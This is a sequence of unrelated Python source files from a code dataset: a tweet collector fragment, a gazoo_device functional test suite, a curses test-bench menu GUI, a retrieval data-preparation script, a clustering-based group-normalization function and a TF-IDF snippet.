OAuthHandler(ckey, csecret)\n auth.set_access_token(atoken, asecret)\n api = tweepy.API(auth)\n user=api.me()\n print(user.name)\n print(user.location)\n twitterStream = Stream(auth, listener())\n twitterStream.filter(track=[entity])\n return 0\nif __name__ == '__main__':\n collect('modi')\n\n\n\n\n\n\n\n","sub_path":"UI/home/tweet_collector.py","file_name":"tweet_collector.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"140936194","text":"# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Test suite for all primary devices. Covers basic functionality.\"\"\"\nimport datetime\nimport os\nimport shutil\nimport time\nfrom typing import Tuple, Type\n\nimport gazoo_device\nfrom gazoo_device import errors\nfrom gazoo_device import fire_manager\nfrom gazoo_device.base_classes import gazoo_device_base\nfrom gazoo_device.tests.functional_tests.utils import gdm_test_base\nimport retry\n\n# Allows the log process to catch up after device creation using time.sleep().\n# Prevents _verify_no_unexpected_bootups() from checking old bootup log events.\n_LOG_CATCH_UP_DELAY = 3\n\n\nclass CommonTestSuite(gdm_test_base.GDMTestBase):\n \"\"\"Common test suite for all primary devices.\"\"\"\n\n @classmethod\n def is_applicable_to(cls, device_type: str,\n device_class: Type[gdm_test_base.DeviceType],\n device_name: str) -> bool:\n \"\"\"Determine if this test suite can run on the given device.\"\"\"\n return issubclass(device_class, gazoo_device_base.GazooDeviceBase)\n\n @classmethod\n def requires_pairing(cls) -> bool:\n \"\"\"Returns True if the device must be paired to run this test suite.\"\"\"\n return False\n\n @classmethod\n def required_test_config_variables(cls) -> Tuple[str, ...]:\n \"\"\"Returns keys required to be present in the functional test config.\"\"\"\n return (\"shell_cmd\", \"expect\", \"known_logline\")\n\n @retry.retry(tries=2, delay=30)\n def test_01_factory_reset(self):\n \"\"\"Tests factory resetting the device and verifies it's online after.\n\n The test name includes \"01\" to make sure this test appears (and therefore\n runs) before other tests in alphabetic order.\n \"\"\"\n time.sleep(_LOG_CATCH_UP_DELAY)\n start_time = datetime.datetime.now()\n\n self.device.factory_reset()\n self.assertTrue(\n self.device.connected,\n f\"{self.device.name} is offline after factory_reset() execution \"\n \"finished. factory_reset should block until the device comes back \"\n \"online and becomes responsive.\")\n self._verify_no_unexpected_reboots(start_time)\n\n def test_close_device(self):\n \"\"\"Tests that device.close() stops logging.\"\"\"\n log_file = self.device.log_file_name\n self.assertTrue(\n os.path.exists(log_file), \"Cannot test close as device is not logging\")\n self.device.close()\n time.sleep(1)\n size = os.stat(log_file).st_size\n time.sleep(.1)\n self.assertEqual(size,\n os.stat(log_file).st_size,\n \"Log has updated after device is closed\")\n\n def test_logging(self):\n \"\"\"Tests that device logs are being captured.\"\"\"\n self._verify_logging()\n\n def test_serial_number(self):\n \"\"\"Tests retrieval of 'serial_number' property.\"\"\"\n serial_number = self.device.serial_number\n self.assertTrue(serial_number)\n self.assertIsInstance(serial_number, str)\n\n def test_firmware_version(self):\n \"\"\"Tests retrieval of 'firmware_version' property.\"\"\"\n self._verify_firmware_version()\n\n @retry.retry(tries=2, delay=30)\n def test_reboot_and_expect_known_logline(self):\n \"\"\"Tests rebooting and waiting for a certain log line.\n\n After the reboot verifies that the device is connected, logging, able to\n retrieve the firmware version, passes health checks, that the device\n actually rebooted, and that no unexpected bootups happened. Also waits for\n the known log line after rebooting.\n \"\"\"\n time.sleep(_LOG_CATCH_UP_DELAY)\n start_time = datetime.datetime.now()\n\n self.device.reboot()\n self.assertTrue(\n self.device.connected,\n f\"{self.device.name} is offline after reboot() execution finished. \"\n \"reboot should block until the device comes back online and becomes \"\n \"responsive.\")\n self._verify_logging()\n self._verify_firmware_version()\n self._verify_expect_log()\n\n # Wait to ensure last bootup event has been logged by the logger process.\n time.sleep(_LOG_CATCH_UP_DELAY)\n self._verify_boot_up_log(start_time)\n self._verify_no_unexpected_reboots(start_time)\n\n try:\n self.device.check_device_ready()\n except errors.CheckDeviceReadyError as err:\n self.fail(\n f\"{self.device.name} didn't pass health checks after reboot: {err!r}\")\n\n def test_shell(self):\n \"\"\"Tests shell() method.\"\"\"\n response = self.device.shell(self.test_config[\"shell_cmd\"])\n self.assertTrue(response)\n self.assertIsInstance(response, str)\n\n def test_start_new_log(self):\n \"\"\"Tests that start_new_log begins a new log file.\"\"\"\n old_log_file_name = self.device.log_file_name\n self.device.start_new_log(log_name_prefix=self.get_log_suffix())\n self.assertNotEqual(\n old_log_file_name, self.device.log_file_name,\n f\"Expected log file name to change from {old_log_file_name}\")\n self.assertTrue(\n os.path.exists(old_log_file_name),\n f\"Expected old log file name {old_log_file_name} to exist\")\n self.assertTrue(\n os.path.exists(self.device.log_file_name),\n f\"Expected new log file name {self.device.log_file_name} to exist\")\n\n def test_get_prop(self):\n \"\"\"Tests that FireManager.get_prop() can retrieve all properties.\"\"\"\n device_name = self.device.name\n self.device.close()\n fire_manager_instance = fire_manager.FireManager()\n try:\n fire_manager_instance.get_prop(device_name)\n finally:\n fire_manager_instance.close()\n\n @retry.retry(tries=2, delay=30)\n def test_redetect(self):\n \"\"\"Tests device detection and properties populated during detection.\"\"\"\n self.device.close()\n time.sleep(.2)\n new_file_devices_name = os.path.join(self.get_output_dir(),\n \"test_redetect_devices.json\")\n new_file_options_name = os.path.join(self.get_output_dir(),\n \"test_redetect_device_options.json\")\n new_log_file = os.path.join(self.get_output_dir(), \"test_redetect_gdm.txt\")\n\n shutil.copy(self.get_manager().device_file_name, new_file_devices_name)\n shutil.copy(self.get_manager().device_options_file_name,\n new_file_options_name)\n new_manager = gazoo_device.Manager(\n device_file_name=new_file_devices_name,\n device_options_file_name=new_file_options_name,\n log_directory=self.get_output_dir(),\n gdm_log_file=new_log_file)\n try:\n new_manager.redetect(self.device.name, self.get_output_dir())\n finally:\n new_manager.close()\n\n # pylint: disable=protected-access\n self.assertTrue(\n self.device.name in new_manager._devices,\n \"Device was not successfully detected. See test_redetect_gdm.txt and \"\n f\"{self.device.device_type}_detect.txt for more info\")\n old_dict = self.get_manager()._devices[self.device.name][\"persistent\"]\n new_dict = new_manager._devices[self.device.name][\"persistent\"]\n # pylint: enable=protected-access\n\n for name, a_dict in [(\"Old\", old_dict), (\"Detected\", new_dict)]:\n self.logger.info(\"%s configuration:\", name)\n for key, value in a_dict.items():\n self.logger.info(\"\\t%s: %s\", key, value)\n\n missing_props = []\n bad_values = []\n for prop, old_value in old_dict.items():\n if prop in new_dict:\n new_value = new_dict[prop]\n if old_value != new_value:\n bad_values.append(\"{}: {!r} was previously {!r}\".format(\n prop, new_value, old_value))\n else:\n missing_props.append(prop)\n msg = \"\"\n if missing_props:\n msg += \"{} is missing the following previous props: {}.\\n\".format(\n self.device.name, missing_props)\n if bad_values:\n msg += \"{} has the following mismatched values: {}.\".format(\n self.device.name, \", \".join(bad_values))\n\n self.assertFalse(missing_props or bad_values, msg)\n\n def _verify_firmware_version(self):\n \"\"\"Verifies that firmware version is a non-empty string.\"\"\"\n firmware_version = self.device.firmware_version\n self.assertTrue(firmware_version)\n self.assertIsInstance(firmware_version, str)\n\n def _verify_logging(self):\n \"\"\"Verifies that the device has a non-empty log file.\"\"\"\n log_file = self.device.log_file_name\n self.assertTrue(os.path.exists(log_file),\n f\"{self.device.name}'s log file {log_file} does not exist\")\n self.assertTrue(os.path.getsize(log_file),\n f\"{self.device.name}'s log file {log_file} is empty\")\n\n def _verify_boot_up_log(self, start_time):\n \"\"\"Verifies that the device booted up once after the start_time.\"\"\"\n parser_result = self.device.event_parser.get_last_event([\"basic.bootup\"])\n self.assertGreater(parser_result.count, 0,\n \"Error: event label 'basic.bootup' not found.\")\n timestamp = parser_result.results_list[0][\"system_timestamp\"]\n self.assertGreater(\n timestamp, start_time,\n \"Expected basic bootup timestamp {} to be > start time {}\".format(\n timestamp, start_time))\n\n def _verify_expect_log(self):\n \"\"\"Verifies that 'known_logline' occurs in device logs.\"\"\"\n self.logger.info(\"Expecting logline %r\", self.test_config[\"known_logline\"])\n res = self.device.switchboard.expect([self.test_config[\"known_logline\"]],\n timeout=30)\n self.assertFalse(\n res.timedout,\n \"Expect timed out when waiting for log line {!r}. Shell response: {}\"\n .format(self.test_config[\"known_logline\"], res.before))\n\n def _verify_no_unexpected_reboots(self, start_time):\n \"\"\"Verifies that no unexpected reboots occurred after start_time.\"\"\"\n bootups = self.device.event_parser.get_unexpected_reboots()\n unexpected_timestamps = [event[\"system_timestamp\"]\n for event in bootups\n if event[\"system_timestamp\"] > start_time]\n self.assertFalse(\n unexpected_timestamps,\n \"There were {} unexpected bootups after {} at {}\".format(\n len(unexpected_timestamps), start_time, unexpected_timestamps))\n\n\nif __name__ == \"__main__\":\n gdm_test_base.main()\n","sub_path":"gazoo_device/tests/functional_tests/common_test_suite.py","file_name":"common_test_suite.py","file_ext":"py","file_size_in_byte":10582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"86759132","text":"'''\nThe frontend of the testserver gui.\n'''\n\nimport curses\n\nAUTHOR = \"Sol O.\"\nOPT_SELECTED_DELAYMS = 1000\n\n\nclass MenuItem:\n def __init__(self, name: str, x_pos, y_pos, initial_text=\" \", final_text=\" ->\"):\n self.name = name\n self.x_pos = x_pos\n self.y_pos = y_pos\n\n self.initial_text = initial_text\n self.final_text = final_text\n\n def get_title_str(self, uppercase=True):\n ret_val = \"\"\n if self.initial_text is not None:\n ret_val += self.initial_text\n\n if uppercase:\n ret_val += self.name.upper()\n else:\n ret_val += self.name\n\n if self.final_text is not None:\n ret_val += self.final_text\n return ret_val\n\n\nclass GUI:\n def __init__(self, testrunner=None, testing=True): # modified for our purposes.\n # def __init__(self, testing=True): #This is the generic one.\n if testing is True:\n print(\"Starting GUI in testing mode.\")\n self.testing = testing\n self.testrunner = testrunner\n\n self.board_list = []\n self.rev_list = []\n # allow the option to include config file while testing. Should throw an error if no config file specified in normal mode.\n if ((self.testing is True) and (self.testrunner is None)):\n # fake values for easy testing.\n self.config_file = \"Testing\"\n self.board_list = ['fake1', 'fake2', 'fake3', 'fake4', 'fake5']\n self.rev_list = ['REV1', 'REV2', 'REV3', 'REV4', 'REV5', 'REV6'] # NOTE: This is not how this normally works.... will not be a single, static list but a list per board above.\n else:\n self.config_file = self.testrunner.config.cfg_filename\n self.board_list = self.testrunner.config.get_board_list()\n\n self.height = 0 # MUST be set with stdscr.getmaxyx() in gui_init()\n self.width = 0 # MUST be set with stdscr.getmaxyx() in gui_init()\n self.page_name = \"GUI\"\n\n # These should be adjusted to reflect other GUI elements such as the title bar, etc.\n self.const_maxX = 0\n self.const_maxY = 1\n # Same as above... must also be added to const_min/Y once the maxX/Y is obtained each frame.\n self.const_lowerXoffset = 1\n self.const_lowerYoffset = -2\n\n self.volatile_minX = self.width # must also be set on getting max XY\n self.volatile_minY = self.height # must also be set on getting max XY.\n\n self.cursor_x = self.const_maxX # This shoudln't change at all. L/R keystrokes move up and down menus.\n self.cursor_y = self.const_maxY\n\n self.title = \"Should be set by gui_refresh()\"\n self.subtitle = \"Should be set by gui_refresh()\"\n self.statusbarstr = \"Should be set by gui_refresh()\"\n\n def load_list_elements(self, element_list: list, initial_text=\" \", final_text=None):\n '''takes a list of strings and turns them into a list of MenuItem instances,\n starts at topmost available y value and moves down, aligned '''\n counter = 0\n ret_list = []\n for item in element_list:\n ret_list.append(MenuItem(item, self.const_maxX, (self.const_maxY + counter), initial_text=initial_text, final_text=final_text))\n counter += 1\n return ret_list\n\n def gui_refresh(self, stdscr):\n # Initialization\n stdscr.clear()\n self.height, self.width = stdscr.getmaxyx()\n self.volatile_minX = self.width + self.const_lowerXoffset\n self.volatile_minY = self.height + self.const_lowerYoffset\n\n # standard page strings and header text\n self.title = \"BSI Testbed {}\".format(self.page_name)[:self.width - 1]\n self.subtitle = \"Written by {}\".format(AUTHOR)[:self.width - 1]\n self.statusbarstr = \"Press 'q' to exit | STATUS BAR | Configuration: {}\".format(self.config_file)[\n :self.width - 1]\n\n \"\"\"\n Must refresh GUI before drawing common elements to ensure the window size hasn't changed.\n \"\"\"\n def draw_common_elements(self, stdscr):\n # Centering calculations\n start_x_title = int((self.width // 2) - (len(self.title) // 2) - len(self.title) % 2)\n start_x_subtitle = int((self.width // 2) - (len(self.subtitle) // 2) - len(self.subtitle) % 2)\n # start_y_title = int((self.height // 2) - 2)\n start_y_title = int(0)\n\n # Render status bar\n stdscr.attron(curses.color_pair(2))\n stdscr.addstr(self.height - 1, 0, self.statusbarstr)\n stdscr.addstr(self.height - 1, len(self.statusbarstr), \" \" * (self.width - len(self.statusbarstr) - 1))\n stdscr.attroff(curses.color_pair(2))\n\n # Turning on attributes for title\n stdscr.attron(curses.color_pair(3))\n stdscr.attron(curses.A_BOLD)\n # Rendering title\n stdscr.addstr(start_y_title, start_x_title, self.title)\n # Render bar before title\n stdscr.addstr(start_y_title, 0, \" \" * (((self.width - len(self.title)) // 2) - 1))\n # Render bar after title\n stdscr.addstr(start_y_title, (start_x_title + len(self.title)), \" \" * (((self.width - len(self.title)) // 2) - 0))\n # Turning off attributes for title\n stdscr.attroff(curses.color_pair(3))\n stdscr.attroff(curses.A_BOLD)\n\n # Print rest of text\n # stdscr.addstr(start_y_title + 1, start_x_subtitle, self.subtitle)\n # stdscr.addstr(start_y_title + 3, (self.width // 2) - 2, '-' * 4)\n # stdscr.addstr(start_y_title + 5, start_x_keystr, keystr)\n # stdscr.addstr(start_y_title + 6, (width // 2), l_r_str)\n stdscr.move(self.cursor_y, self.cursor_x)\n\n def draw_menu(self, list_of_elements, stdscr):\n \"\"\"Once an element list has been parsed by load_menu_items(), use draw_menu_items()\n to draw the menu items from the created MenuItem instances\"\"\"\n stdscr.attron(curses.color_pair(1))\n for item in list_of_elements:\n if self.cursor_y == item.y_pos:\n stdscr.attroff(curses.color_pair(1))\n stdscr.attron(curses.color_pair(2))\n stdscr.addstr(item.y_pos, item.x_pos, (item.get_title_str() + (\" \" * (self.width - len(item.get_title_str())))))\n #stdscr.addnstr(item.y_pos, item.x_pos, (item.get_title_str() + (\" \" * (self.width - len(item.get_title_str())))))\n stdscr.attroff(curses.color_pair(2))\n stdscr.attron(curses.color_pair(1))\n else:\n stdscr.addstr(item.y_pos, item.x_pos, (item.get_title_str() + (\" \" * (self.width - len(item.get_title_str())))))\n stdscr.attroff(curses.color_pair(1))\n\n def test_menu_enter_handler(self, stdscr, name):\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(self.volatile_minY, 0, \"Selected IteM: {}\".format(name))\n stdscr.attroff(curses.color_pair(1))\n\n def main_menu_enter_handler(self, stdscr, name):\n # only accept no testrunner if testing is set to true.\n if (self.testing is True) and (self.testrunner is None):\n self.sub_menu(stdscr, name, self.rev_list)\n else:\n revs = self.testrunner.config.get_rev_list(name)\n # get_rev_list will return None if there's no revisions in the yaml file.\n if revs is None:\n revs = [\"No board revisions found.\"]\n self.sub_menu(stdscr, name, revs)\n\n def board_menu_enter_handler(self, stdscr, name):\n if (self.testing is True):\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(self.volatile_minY, 0, \"Selected IteM: {}\".format(name))\n stdscr.attroff(curses.color_pair(1))\n else:\n return name\n\n# TODO: the status messages printed here are not ideal. need to make sure the formatting makes sense.\n def menu_enter(self, stdscr, current_menu_items, enter_handler):\n for item in current_menu_items:\n if item.y_pos == self.cursor_y:\n return item.name, enter_handler(stdscr, item.name)\n else:\n continue\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(self.volatile_minY, 0, \"Nothing selected!\")\n stdscr.attroff(curses.color_pair(1))\n\n def sub_menu(self, stdscr, name, menu_element_list):\n self.page_name = name\n parent_item = name\n k = 0\n flag_back = False\n flag_fwd = False\n self.cursor_x = self.const_maxX\n self.cursor_y = self.const_maxY\n\n self.gui_refresh(stdscr)\n self.draw_common_elements(stdscr)\n self.statusbarstr = \"Press the 'back' arrow twice to go back | STATUS BAR | Configuration: {}\".format(self.testrunner.config.cfg_filename)[\n :self.width - 1]\n\n current_menu_items = self.load_list_elements(menu_element_list, initial_text=\" - \", final_text=\" | |\")\n\n while (k != curses.KEY_LEFT):\n\n flag_back = False\n flag_fwd = False\n\n if k == curses.KEY_LEFT:\n #curses.flash()\n flag_back = True\n elif k == ord('q'):\n quit()\n elif k == curses.KEY_RIGHT:\n flag_fwd = True\n #stdscr.attron(curses.color_pair(1))\n #stdscr.addstr(int((self.height / 2 + 3)), 0, \"Right key pressed\")\n #stdscr.attroff(curses.color_pair(1))\n elif k == curses.KEY_DOWN:\n self.cursor_y = self.cursor_y + 1\n elif k == curses.KEY_UP:\n self.cursor_y = self.cursor_y - 1\n\n # check new coordinates against designated max/min values\n self.cursor_x = max(self.const_maxX, self.cursor_x)\n self.cursor_x = min(self.volatile_minX, self.cursor_x)\n\n self.cursor_y = max(self.const_maxY, self.cursor_y)\n self.cursor_y = min(self.volatile_minY, self.cursor_y)\n\n self.gui_refresh(stdscr)\n self.statusbarstr = \"Press the 'back' arrow to go back | Press 'q' to Quit. | Configuration: {}\".format(\n self.config_file)[:self.width - 1]\n self.draw_menu(current_menu_items, stdscr)\n self.draw_common_elements(stdscr)\n\n if flag_back is True:\n return\n if flag_fwd is True:\n if self.testing is True:\n self.menu_enter(stdscr, current_menu_items, self.test_menu_enter_handler)\n else:\n #TODO: this is sus. Make sure it works with boards with no revision.\n #stdscr.clear()\n revtup = (self.menu_enter(stdscr, current_menu_items, self.board_menu_enter_handler))\n try:\n rev = revtup[0] # have to do this because menu_enter will return a tuple in this case.\n except:\n rev = None\n if rev is not None:\n stdscr.erase()\n stdscr.attron(curses.color_pair(1))\n selected_opt_msg = \"Selected board: {}, rev: {}\".format(parent_item, str(rev))\n stdscr.addstr(self.height//2, ((self.width//2) - (len(selected_opt_msg)//2)), selected_opt_msg)\n stdscr.attroff(curses.color_pair(1))\n stdscr.refresh()\n curses.delay_output(OPT_SELECTED_DELAYMS)\n curses.endwin()\n #stdscr.clear()\n #stdscr.refresh()\n self.testrunner.run_test(parent_item, rev)\n\n self.gui_refresh(stdscr)\n self.statusbarstr = \"Press the 'back' arrow to go back | Press 'q' to Quit. | Configuration: {}\".format(\n self.config_file)[:self.width - 1]\n self.draw_menu(current_menu_items, stdscr)\n self.draw_common_elements(stdscr)\n \"\"\"stdscr.attron(curses.color_pair(1))\n stdscr.addstr(int((self.height - 3)), 0, \"Right key pressed\")\n stdscr.attroff(curses.color_pair(1))\"\"\"\n\n # Refresh the screen\n stdscr.refresh()\n # Wait for next input\n k = stdscr.getch()\n\n def main_menu(self, stdscr):\n self.page_name = \"Main Menu\"\n k = 0\n flag_back = False\n flag_fwd = False\n self.cursor_x = self.const_maxX\n self.cursor_y = self.const_maxY\n\n self.gui_refresh(stdscr)\n self.draw_common_elements(stdscr)\n\n element_list = self.load_list_elements(self.board_list, final_text=\" -->\")\n\n while (k != ord('q')):\n self.page_name = \"Main Menu\"\n flag_back = False\n flag_fwd = False\n\n if k == curses.KEY_LEFT:\n #curses.flash()\n flag_back = True\n elif k == curses.KEY_RIGHT:\n flag_fwd = True\n #stdscr.attron(curses.color_pair(1))\n #stdscr.addstr(int((self.height / 2 + 3)), 0, \"Right key pressed\")\n #stdscr.attroff(curses.color_pair(1))\n elif k == curses.KEY_DOWN:\n self.cursor_y = self.cursor_y + 1\n elif k == curses.KEY_UP:\n self.cursor_y = self.cursor_y - 1\n\n # check new coordinates against designated max/min values\n self.cursor_x = max(self.const_maxX, self.cursor_x)\n self.cursor_x = min(self.volatile_minX, self.cursor_x)\n\n self.cursor_y = max(self.const_maxY, self.cursor_y)\n self.cursor_y = min(self.volatile_minY, self.cursor_y)\n\n self.gui_refresh(stdscr)\n self.draw_menu(element_list, stdscr)\n self.draw_common_elements(stdscr)\n\n if flag_back is True:\n curses.flash()\n if flag_fwd is True:\n self.menu_enter(stdscr, element_list, self.main_menu_enter_handler)\n \"\"\"stdscr.attron(curses.color_pair(1))\n stdscr.addstr(int((self.height - 3)), 0, \"Right key pressed\")\n stdscr.attroff(curses.color_pair(1))\"\"\"\n\n # Refresh the screen\n stdscr.refresh()\n # Wait for next input\n k = stdscr.getch()\n\n def init_gui(self, stdscr):\n self.width, self.height = stdscr.getmaxyx()\n\n # Clear and refresh the screen for a blank canvas\n stdscr.clear()\n stdscr.refresh()\n\n # Start colors in curses\n curses.start_color()\n curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK) # background/list item color\n #curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK) # old\n curses.init_pair(2, curses.COLOR_BLUE, curses.COLOR_WHITE) # Status bar/selected item color\n curses.init_pair(3, curses.COLOR_CYAN, curses.COLOR_BLUE) # title color\n\n self.main_menu(stdscr)\n\n def start_gui(self):\n curses.wrapper(self.init_gui)\n\n\nif __name__ == \"__main__\":\n app = GUI()\n app.start_app()\n","sub_path":"app/gui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":15114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"454344108","text":"import re\nimport argparse\nimport subprocess\nimport json\nfrom tqdm import tqdm\nfrom pathlib import Path\nimport nltk\nimport numpy as np\nimport random\n\n\ndef count_file_lines(file_path):\n \"\"\"\n Counts the number of lines in a file using wc utility.\n :param file_path: path to file\n :return: int, no of lines\n \"\"\"\n num = subprocess.check_output(['wc', '-l', file_path])\n num = num.decode('utf-8').split(' ')\n return int(num[0])\n\n\ndef main(args):\n Path(args.out_dir).mkdir(parents=True, exist_ok=True)\n\n with open(args.retrieved_code_file) as f:\n retrieved_code = json.load(f)\n\n src_writer = open('{}/{}.source'.format(args.out_dir, args.split), 'w', encoding='utf8')\n tgt_writer = open('{}/{}.target'.format(args.out_dir, args.split), 'w', encoding='utf8')\n\n print(\"topk: \", args.top_k, \" args.UNION: \", args.UNION, flush=True)\n\n def write(source1, target, src_writer=src_writer, tgt_writer=tgt_writer, source2=None):\n source = re.sub(\"[\\n\\r\\t ]+\", \" \", source1)\n target = re.sub(\"[\\n\\r\\t ]+\", \" \", target)\n src_writer.write(source + '\\n')\n tgt_writer.write(target + '\\n')\n\n if source2:\n src_writer.write(source2 + '\\n')\n tgt_writer.write(target + '\\n')\n\n\n\n for idx, ex in enumerate(tqdm(retrieved_code, total=len(retrieved_code))):\n\n try:\n source = ex['question']\n except:\n ex = retrieved_code[ex]\n\n source = ex['question']\n target = ex['answers']\n # assert len(ex['ctxs']) >= args.top_k\n\n\n if (args.top_k<0 or args.NO_CONCODE_VARS) :\n source = source.split('concode_field_sep')[0]\n if args.top_k > 0:\n inserted = 0\n # for rank, ctx in enumerate(ex['ctxs'][:args.top_k]):\n for rank, ctx in enumerate(ex['ctxs']):\n # if \"test.json\" not in ctx[\"id\"] and target.strip()!=ctx[\"text\"].strip(): #for retrieving without test corpus\n if args.WITH_OR_WITHOUT_REF==\"with\": #for retrieving without ref code but includes other codes in the test corpus\n source += ' _CODE_SEP_ ' + ctx[\"text\"].split('_NL_')[0].strip()\n inserted+=1\n if inserted>= args.top_k:\n break\n else:\n if target.strip() != ctx[\"text\"].strip().split('_NL_')[0].strip():\n source += ' _CODE_SEP_ ' + ctx[\"text\"].split('_NL_')[0].strip()\n inserted += 1\n if inserted >= args.top_k:\n break\n\n\n source = re.sub(\"[\\n\\r\\t ]+\", \" \", source)\n target = re.sub(\"[\\n\\r\\t ]+\", \" \", target)\n src_writer.write(source + '\\n')\n tgt_writer.write(target + '\\n')\n\n src_writer.close()\n tgt_writer.close()\n\n print (\"written to: \", src_writer)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--retrieved_code_file\", required=True, help='path to .json file')\n parser.add_argument(\"--split\", required=True, choices=['train', 'valid', 'test'])\n parser.add_argument(\"--top_k\", type=int, default=0, help='number of retrieved code to consider, -1 means only NL before concode_field_sep')\n parser.add_argument(\"--out_dir\", required=True, help='directory path to save data')\n parser.add_argument(\"--mask_rate\", type=float, help='masking words ratio', default=0.15)\n parser.add_argument(\"--NO_CONCODE_VARS\", action=\"store_true\", help='Do not use concode_filed_sep variables')\n parser.add_argument(\"--UNION\", action=\"store_true\", help='UNION of Retrieved and gold vars')\n parser.add_argument(\"--ONLY_RETRIEVAL\", action=\"store_true\", help='ONLY_RETRIEVED CODE will be used as source')\n parser.add_argument(\"--dag\", action=\"store_true\", help='ONLY_RETRIEVED CODE will be used as source')\n parser.add_argument(\"--WITH_OR_WITHOUT_REF\", type=str, help='WITH_OR_WITHOUT_REF')\n args = parser.parse_args()\n # print(\"args: \", flush=True)\n # print(\"--\"*50, flush=True)\n # print(args, flush=True)\n # print(\"--\" * 50, flush=True)\n main(args)","sub_path":"SCODE-G/text_to_code/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"324202747","text":"from __future__ import print_function\r\n\r\nimport argparse\r\n\r\nimport torch\r\n\r\nimport torch.nn as nn\r\n\r\nimport torch.nn.functional as F\r\n\r\nimport torch.optim as optim\r\n\r\nfrom torchvision import datasets, transforms\r\n\r\nfrom group_norm import *\r\n\r\nfrom torch.utils.data import DataLoader, Dataset, TensorDataset\r\n\r\nfrom gamma_correction import *\r\n\r\nfrom Clustering import *\r\n\r\nimport random\r\n\r\nimport os\r\n\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\n\r\n\r\ndef GN_w_BN_f(x, G, eps=1e-5, flag=True):\r\n use_cuda = torch.cuda.is_available()\r\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\r\n rem_grad = x.grad\r\n x = x.cpu()\r\n x_np = x.detach().numpy()\r\n #x_np = x\r\n Nabs, C, H, W = x_np.shape\r\n if flag:\r\n N = Nabs\r\n #x_np_tmp = x.detach().numpy()\r\n res_x = np.zeros((N, C, H, W))\r\n x_np_new = np.zeros((C, N * H * W))\r\n # tmpp = np.zeros((N, H*W))\r\n for i in range(C):\r\n x_np_new[i, :] = np.reshape(x_np[:, i, :, :], (1, N * H * W))\r\n # x_np_new = np.reshape(x_np, (C, N*H*W))\r\n # x_np = x_np.transpose()\r\n image_vector = np.asarray(x_np_new)\r\n Data = data_preparation(n_cluster=G, data=image_vector[:, :])\r\n for val in range(G):\r\n inx = np.argwhere(Data.labels_ == val)\r\n tmp = np.zeros((1, N * H * W * inx.shape[0]))\r\n for idx, idxx in enumerate(inx):\r\n tmp[0, idx * N * H * W:(idx + 1) * N * H * W] = x_np_new[idxx[0], :]\r\n mu = np.mean(tmp)\r\n sigma = np.std(tmp)\r\n for idx, idxx in enumerate(inx):\r\n tmppp = (x_np_new[idxx[0], :] - mu) / np.sqrt(sigma + eps)\r\n for j in range(N):\r\n tmpp = tmppp[j * H * W:(j + 1) * H * W]\r\n res_x[j, idxx[0], :, :] = np.reshape(tmpp, (H, W))\r\n\r\n else:\r\n N = 1\r\n res_x = np.zeros((Nabs, C, H, W))\r\n for ii in range(Nabs):\r\n res_x_tmp = np.zeros((N, C, H, W))\r\n x_np_new = np.zeros((C, N*H*W))\r\n #tmpp = np.zeros((N, H*W))\r\n for i in range(C):\r\n x_np_new[i, :] = np.reshape(x_np[ii, i, :, :], (1, N*H*W))\r\n #x_np_new = np.reshape(x_np, (C, N*H*W))\r\n #x_np = x_np.transpose()\r\n image_vector = np.asarray(x_np_new)\r\n Data = data_preparation(n_cluster=G, data=image_vector[:, :])\r\n for val in range(G):\r\n inx = np.argwhere(Data.labels_ == val)\r\n tmp = np.zeros((1, N*H*W*inx.shape[0]))\r\n for idx, idxx in enumerate(inx):\r\n tmp[0, idx*N*H*W:(idx+1)*N*H*W] = x_np_new[idxx[0], :]\r\n mu = np.mean(tmp)\r\n sigma = np.std(tmp)\r\n for idx, idxx in enumerate(inx):\r\n tmppp = (x_np_new[idxx[0], :] - mu) / np.sqrt(sigma + eps)\r\n for j in range(N):\r\n tmpp = tmppp[j*H*W:(j+1)*H*W]\r\n res_x_tmp[j, idxx[0], :, :] = np.reshape(tmpp, (H, W))\r\n res_x[ii, :, :, :] = res_x_tmp\r\n Res_x = torch.from_numpy(res_x)\r\n Res_x.grad = rem_grad\r\n Res_x = Res_x.to(device)\r\n return Res_x\r\n\r\n\r\n\r\n","sub_path":"GN_w_BN.py","file_name":"GN_w_BN.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"67010885","text":"import numpy as np\nimport pandas as pd\nimport cPickle\nimport os\n\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ncategories = ['alt.atheism', 'soc.religion.christian', 'comp.graphics', 'sci.med']\n\n# twenty_train = fetch_20newsgroups(subset='train',\n # categories=categories, shuffle=True, random_state=42)\n\n# count_vect = CountVectorizer()\n# X_train_counts = count_vect.fit_transform(twenty_train.data)\n\n# tf_transformer = TfidfTransformer().fit(X_train_counts)\n\n# qs = [\"Where is a zebra?\", \"What is a zebra?\"]\n# qsT = tf_transformer.transform(count_vect.transform(qs))\n# print(qsT)\n# 